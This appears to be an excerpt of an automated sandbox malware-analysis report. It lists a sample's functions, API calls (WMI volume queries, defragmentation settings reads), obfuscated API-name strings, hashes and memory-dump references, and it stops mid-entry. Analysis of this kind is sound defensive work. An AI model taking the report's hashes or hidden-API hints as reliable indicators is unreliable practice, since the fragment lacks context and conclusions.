                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FindPrivateProfileString$File$ByteCloseFirstFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: 3401068$3401069$3401070$DefragTime$DefraggedFileCount$DG$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 295610168-2526466113
                                                                                                                                                                                                                                                                                    • Opcode ID: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction ID: 3dc56caefaff00a374a3ee75e2b4c31a72c5442d79c66a3b7d7afc40f3bd3104
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1cd0ec7a8fdc8ff7367d6e0728dff8a46181e4d412615e5ddc93afe06c8e850
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6691A771244340AFD320DF21CC46FAB77E8AF88B14F108A2EF65DA71D1DAB56944CB5A
                                                                                                                                                                                                                                                                                    Function 004197C0 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 287comCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00419894
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 004198B6
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Uninitialize$BlanketCreateInitializeInstanceProxy
                                                                                                                                                                                                                                                                                    • String ID: Caption$SELECT * from Win32_Volume$WQL
                                                                                                                                                                                                                                                                                    • API String ID: 3575674281-2330458756
                                                                                                                                                                                                                                                                                    • Opcode ID: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                    • Instruction ID: d51c13efc7a02c32f90284d818f56e509f551fc104d77d5da5b0aeb1152a1774
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eaf92b9f431350d046898c36b2279287ac79430c6c025d09f53a85bfcf413d8d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10A189766083449FC300EF59C890A9BB7E9EF88354F10491EF44997360D779ED89CBA5
                                                                                                                                                                                                                                                                                    Function 004112B7 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction ID: faa287cb98b21d4df2f3e2fa49730f9b90f221f68114e230af78a147129465c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 637e9459b825226f02b753a8a6ecd317c3f6f5394dd561357564af9cc347cd40
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82516271204341AFE324DB21CD45FAF77E8AB88B04F10891EF64D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    Function 004112B9 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 147fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PrivateProfileString$Find$ByteCloseFileFormatNextSize
                                                                                                                                                                                                                                                                                    • String ID: DefragTime$DefraggedFileCount$LG$TotalDefraggedFileSize$`=$main
                                                                                                                                                                                                                                                                                    • API String ID: 2174522762-3670384684
                                                                                                                                                                                                                                                                                    • Opcode ID: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction ID: 01dd7cb33c618876df907d584398aa6540e784f12a7d1eb18dd06df18f62a64b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32f377f5775842a14210629ecb5cba280cca974c36c24aed09cdb2c69e2afdbd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB516171204341AFE324DB21CD45FAF77E8AB88B04F10891EF54D972D1DA74A945CB6A
                                                                                                                                                                                                                                                                                    Function 00438779 Relevance: 17.7, Strings: 14, Instructions: 234COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                    • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                    • Opcode ID: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                    • Instruction ID: a1250dd2abae281965bcbcd99bbab5f3ca081c7f2ebc100e0f91383b9a449a5d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4eeff96e23f8423c76a4c32bafa8f1c0a88312c509c26e4c8bdaf889564b920
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F9122A2D052A88AF720C625EC04BEBB775EF95301F1881FAD40C67781D67E0EC68F52
                                                                                                                                                                                                                                                                                    Function 00438766 Relevance: 17.7, Strings: 14, Instructions: 182COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                                                                                                                                                                                                    • API String ID: 0-225289630
                                                                                                                                                                                                                                                                                    • Opcode ID: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                    • Instruction ID: 758bb074f1e02f5d219d83cb07dd28aa7128d3b2f90bd517896020da9daeb34d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a85207eefa916ff92804396951960fcbea30f2298476b24e4c016fc00f141f77
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 787135A2D096A88AF7218625EC047EBB775DF91301F0890F9D44CA7781D67E0FC68F26
                                                                                                                                                                                                                                                                                    Function 0044D58E Relevance: 16.8, Strings: 13, Instructions: 531COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: JM<5$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                                                                                                                                                    • API String ID: 0-2011736602
                                                                                                                                                                                                                                                                                    • Opcode ID: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                    • Instruction ID: 63136df9b4e2b9ab88fafee4aab420784887feb0363108930222d5ca6ea7e0ef
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c598ec1c7b20de3c6fa01b0c0dd02dd9d8603e73820023a0ec984d0c6b1ad772
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A92211B1D046698AFB208B24DC40BEAB7B5FF84310F1481FAD80DA7681D6784FC28F56
                                                                                                                                                                                                                                                                                    Function 00436ED8 Relevance: 15.4, Strings: 12, Instructions: 356COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: E$P$P32@$c$e$i$o$r$s$s$t$x
